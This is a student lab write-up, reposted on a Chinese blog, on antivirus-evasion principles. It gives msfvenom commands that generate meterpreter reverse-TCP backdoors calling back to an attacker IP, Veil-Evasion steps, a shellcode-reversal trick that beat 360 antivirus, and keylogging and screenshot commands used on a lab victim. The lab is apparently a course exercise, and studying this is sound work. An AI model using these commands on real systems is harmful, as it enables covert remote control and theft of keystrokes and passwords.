20145226夏艺华《网络对抗》免杀原理与实践

最新推荐文章于 2024-05-01 19:17:00 发布
最新推荐文章于 2024-05-01 19:17:00 发布
阅读量72 收藏
点赞数
文章标签: 运维 操作系统 c/c++
原文链接:http://www.cnblogs.com/bestixyh/p/6625251.html
版权

20145226夏艺华《网络对抗》免杀原理与实践

基础问题回答

杀软是如何检测出恶意代码的?

(1)基于特征码的检测:杀毒软件有一个病毒的特征码(由一个不大于64字节的特征串组成)库,通过识别恶意代码的特征码检测恶意代码。
(2)启发式恶意软件检测:“When I see a bird that walks like a duck and swims like a duck and quacks like a duck, I call that bird a duck.”分析对象文件与病毒特征库中的病毒原码进行比较。
(3)基于行为的恶意软件检测:在一种程序运行的状态下对其行为进行监控,如果有敏感行为会报毒,是一种动态的监测与捕捉。

免杀是做什么?

使恶意代码绕过杀毒软件的查杀

免杀的基本方法有哪些?

(1)通过花指令、加壳、重组编码shellcode等方法来绕过杀毒软件的检测
(2)通过改变恶意代码的操作方式及通讯方式等行为来避免被查杀
(3)自己编写(不再病毒库中)

实践总结与体会

这次实验有毒!!!
毒大了!!!开始做的步骤完全没有问题 但就是要被杀[smile]
最后 终于 出来 了 真是感动。。。

离实战还缺些什么技术或步骤?
技术远远不够实际应用,还要积累更多丰富的知识才能达到实战的水平。

实践过程记录

msfvenom直接生成meterpreter后门程序

这是后门实验已经实现的~
· 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.43.51.202 LPORT=26 -f exe >20145226.exe来生成后门程序,如图所示:
1002160-20170318224436807-1306964925.png
· 然后发送到windows 7里。

· 现在在kali中用msfconsole命令开启msf,并进行设置,步骤如图所示

1002160-20170318224616635-114729452.png
1002160-20170318224640120-745835810.png
1002160-20170318224700979-1340375733.png
1002160-20170318224819807-1659753219.png

· 此时开始监听,在windows 7中运行后门程序20145226.exe就可成功控制远程shell,如图使用命令dir查看系统版本信息:
1002160-20170318225007213-135832533.png

· 使用命令screenshot对靶机进行截图:
1002160-20170318225121729-59745973.png
1002160-20170318225135432-174125225.png

· 使用命令keyscan_start开始和keyscan_dump结束记录键盘输入:
1002160-20170318225311979-1593800760.png
(如果是在输入密码,瞬间暴露[smile])

· 获得运行Meterpreter会话的用户名
1002160-20170318225503245-1320749043.png
ps:由于我的win 7是我自己的虚拟机,没有连接摄像头,所以没有偷拍成功~

使用Veil-Evasion生成可执行文件

· 在kali虚拟机终端输入veil-evasion进入veil-evasion环境:
1002160-20170327093021561-891370002.png

· 输入use python/meterpreter/rev_tcp,之后生成可执行文件veil5226.exe
1002160-20170327093001623-449109814.png
1002160-20170327092936858-972868602.png
1002160-20170327085904061-509651027.png
对应的py文件,不明觉厉:
1002160-20170327093132014-259703681.png

· 将生成的可执行文件传到主机,gg,被360发现了
1002160-20170327090105358-1549651476.png
· 上传到virscan扫描一下,4/39发现病毒诶
1002160-20170327090314748-2101717551.png

使用C语言调用Shellcode

在kali主机下,进入终端,执行指令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.132 LPORT=443 -f c

LHOST:攻击机IP
LPORT:反弹连接端口
c:生成一个c语言格式的Shellcode数组

1002160-20170327093256170-1569812780.png

将上述代码从虚拟机里粘出来到Microsoft Visual Studio 2010进行编译运行生成可执行文件
(涉及木马不便展示)
gg,又被360发现了。。。
1002160-20170327093342701-953631943.png
很sad。

修改shellcode——逆序

原有shellcode不变,只在Microsoft Visual Studio 2010下对源代码进行逆序修改:
对shellcode数组求逆序后输出到文件:
1002160-20170327093423701-271753758.png

输出到文本后复制粘贴到木马源代码中,为如下格式:
\x:按照输出数转换为16进制的实际位数输出,所以显示出了32位16进制数(补码形式)
替换一下ffffff,如图:
1002160-20170327090938811-519927523.png
靶机为win10系统,360杀毒。

免杀的实现与回连

在虚拟机中启动监听,成功回连;然后再getuid、ls、ipconfig一下,啥都暴露了[smile]
1002160-20170327083454373-1493604740.png
1002160-20170327083524701-1337384157.png
1002160-20170327083538451-1496334046.png
360杀毒软件也没有查出病毒!
1002160-20170327085740389-885867951.jpg

实验感想

这个实验做得那么艰辛是因为。。。我每次生成的exe都是放到win7虚拟机里面去运行的,永远都是各种缺少某个dll文件我的问题,让人感到崩溃。。。最后放到主机win10运行一下就成功了。。。蓝瘦香菇

转载于:https://www.cnblogs.com/bestixyh/p/6625251.html

weixin_30724853
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
艺华专用机最新升级固件20180401
04-03
艺华专用机最新升级固件 20180401 ,考入u盘,在系统里选择USB升级,找到升级固件FTA-9800A_973+1.0.16_180322,确定,然后不能动u盘,不能断电,系统会自动完成,大概3分钟,经过好几次的重启,最后进入节目是黑屏...
卫星机艺华幸运星8000B升级固件
01-28
升级固件,升级后自动升级,以后不用再手动升级,官方固件,应永久有效
20145226夏艺华 网络对抗技术EXP8 WEB基础实践
weixin_30878361的博客
05-10 96
20145226夏艺华 网络对抗技术EXP8 WEB基础实践 实验问题回答 1.什么是表单? 表单在网页中主要负责数据采集功能。一个表单有三个基本组成部分: 表单标签:这里面包含了处理表单数据所用CGI程序的URL以及数据提交到服务器的方法。 表单域:包含了文本框、密码框、隐藏域、多行文本框、复选框、单选框、下拉选择框和文件上传框等。 表单按钮:包括提交按钮、复位按钮和一般按钮;用于将数据传送到服...
20145226夏艺华 网络对抗技术 EXP9 web安全基础实践
weixin_30344131的博客
05-20 130
20145226夏艺华 网络对抗技术 EXP9 web安全基础实践 !!!免考项目:wannacry病毒分析+防护 一.实验后回答问题 SQL注入攻击原理,如何防御 攻击原理 “SQL注入”是一种利用未过滤/未审核用户输入的攻击方法(“缓存溢出”和这个不同),意思就是让应用运行本不应该运行的SQL代码。如果应用毫无防备地创建了SQL字符串并且运行了它们,就会造成一些出人意料的结果。 注入方法一般有...
20145226夏艺华 网络对抗技术 EXP7 网络欺诈技术防范
weixin_30532973的博客
05-02 117
20145226夏艺华 网络对抗技术 EXP7 网络欺诈技术防范 实践内容 本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。 · 简单应用SET工具建立冒名网站 · ettercap DNS spoof · 结合应用两种技术,用DNS spoof引导特定访问到冒名网站。 实验后回答问题 通常在什么场景下容易受到DNS spoof攻击? 在同一个局域网内很容易,比如乱连公...
20145226夏艺华 网络对抗技术EXP4 恶意代码分析
weixin_30496751的博客
04-05 88
20145226夏艺华 网络对抗技术EXP4 恶意代码分析(未完成版) 回答问题 (1)如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么。请设计下你想监控的操作有哪些,用什么方法来监控。 · schtasks——设置一个计划任务,指定时间记录主机的联网记录或者是端口开放、注册表信息等等; · sysmon——配置好想记录事件的文件,可以在事件查看器里找到相关...
论文研究-Mesh无线传感器网络地址借用策略 .pdf
08-16
Mesh无线传感器网络地址借用策略,朱艺华,孙聪,IEEE 802.15.5标准为基于IEEE 802.15.4标准的无线传感器网络提供了mesh功能。通过为节点分配连续逻辑地址块,802.15.5不需要路由发现和路由表�
卢本捷期末重点口述记录(张艺华记录)1
08-08
并行计算Cuda不考MPI基于消息传递方式填空选择判断大题填空 选择 判断大部分 概念 术语 注意事项 算法复杂度(简单)复杂的算法在大题并行计算应用 √ 定义
南海艺华不锈钢铝业有限公司质量体系程序文件.doc
09-30
南海艺华不锈钢铝业有限公司质量体系程序文件.doc
Docker consul的容器服务更新与发现
YUEAwb的博客
04-29 774
consul是google开源的一个使用go语言开发的服务管理软件。支持多数据中心、分布式高可用的、服务发现和配置共享。采用Raft算法,用来保证服务的高可用。内置了服务注册与发现框架、分布一致性协议实现、健康检查、Key/Value存储、多数据中心方案,不再需要依赖其他工具(比如ZooKeeper等)。服务部署简单,只有一个可运行的二进制的包。每个节点都需要运行agent,他有两种运行模式server 和 client。
Virtualbox7.0.10--创建虚拟机
醉殇姒若梦遗年 ツ的博客
04-29 369
6.完成后的界面,至此虚拟机新建完成。左侧是我们新建的虚拟电脑,右侧是它的一些配置项,右侧上方,我们可以点击【注册】进行导入一个操作系统的镜像,【启动】可以直接启动虚拟电脑。虚拟电脑名称为Ubuntu20.04,文件夹存放在D盘,虚拟光盘可以暂时不选,系统类型设置为Linux,版本设置为Ubuntu(64-bit),设置好以后单击“4.内存配置好后,就需要配置下硬盘了,主要是硬盘的容量,默认是25G,可以不改,直接。5.最后,再确认一下整体的配置,如果没有问题,可以直接点击“”,进入新建虚拟电脑页面。
用Docker单独安装xiaoya-alist
wbsu2004的博客
04-29 2127
小雅是资源聚合站,通过自己的阿里云盘中转缓存资源,可以实现大量的资源在线播放。
Spring Cloud——LoadBalancer
最新发布
????
05-01 1166
这里只是简单的讲解了一下LoadBalancer如何使用,因为实际上我们使用的不是很多,主要还是使用OpenFeign。
云计算知识点-02
lv785的博客
04-27 1482
DataNode是HDFS文件系统的工作节点,DataNode会按照客户端或者是NameNode的调度来存储和检索数据,并定期向NameNode发送它所存储的数据块列表,DataNode是文件系统中真正存储数据的地方。通过这种虚拟化可以减少服务器的数量,提高服务器的使用效率,可以在一定程度上摆脱物理上的空间限制,实现随时随地随需的自由掌控。Glance(镜像服务组件),其作用是:提供虚拟机镜像的存储,查询和检索功能,为nova进行服务,依赖于存储服务(存储镜像本身)和数据库服务(存储镜像相关的数据)。
lua编译器介绍
笨死的猪Blog
04-27 809
Lua编译器是将Lua语言编写的源代码转换为可执行代码的工具。
解决主机有网络但虚拟机没网络连接问题----记录
Iamsonice的博客
04-27 584
发现只有lo本地回环网卡ip并没有真实网卡IP。
MacosM3(一)Docker安装
qq_33326733的博客
04-28 155
1、打开Docker官网,2、选择AppleChip。4、查看是否安装成功。
用 Python 进行渗透测试
黑战士的博客
04-28 967
编写一个端口扫描器Python 提供了访问 BSD 套接字的接口Web 服务器可能位于 TCP 80 端口、电子邮件服务器在 TCP 25 端口、FTP 服务器在 TCP 21 端口TCP 全连接扫描为了抓取目标主机上应用的 Banner,找到开放的端口后,向它发送一个数据串并等待响应。
superset部署与实践
m0_60125201的博客
04-29 805
本博客简要介绍了superset这个BI工具,使用两种方法来部署superset,并简单介绍了superset的使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值